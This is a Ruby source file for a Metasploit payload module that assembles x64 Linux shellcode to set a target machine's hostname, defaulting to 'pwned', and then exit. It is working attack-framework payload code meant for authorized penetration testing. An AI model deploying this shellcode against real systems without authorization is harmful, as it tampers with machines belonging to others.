1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 40
8

9
  include Msf::Payload::Single
10
  include Msf::Payload::Linux
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Linux Set Hostname',
17
        'Description' => 'Sets the hostname of the machine.',
18
        'Author' => 'Muzaffer Umut ŞAHİN <[email protected]>',
19
        'License' => MSF_LICENSE,
20
        'Platform' => 'linux',
21
        'Arch' => ARCH_X64,
22
        'Privileged' => true
23
      )
24
    )
25

26
    register_options(
27
      [
28
        OptString.new('HOSTNAME', [true, 'The hostname to set.', 'pwned'])
29
      ]
30
    )
31
  end
32

33
  def generate(_opts = {})
34
    hostname = (datastore['HOSTNAME'] || 'pwned').gsub(/\s+/, '') # remove all whitespace from hostname.
35
    length = hostname.length
36
    if length > 0xff
37
      fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be less than 255 characters.')
38
    end
39

40
    payload = %^
41
      push 0xffffffffffffff56 ; sethostname() syscall number.
42
      pop rax
43
      neg rax
44
      jmp str
45

46
    end:
47
      push #{length}
48
      pop rsi
49
      pop rdi    ; rdi points to the hostname string.
50
      xor byte [rdi+rsi], 0x41
51
      syscall
52

53
      push 60    ; exit() syscall number.
54
      pop rax
55
      xor rdi,rdi
56
      syscall
57

58
    str:
59
      call end
60
      db "#{hostname}A"
61
    ^
62

63
    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
64
  end
65
end
66

67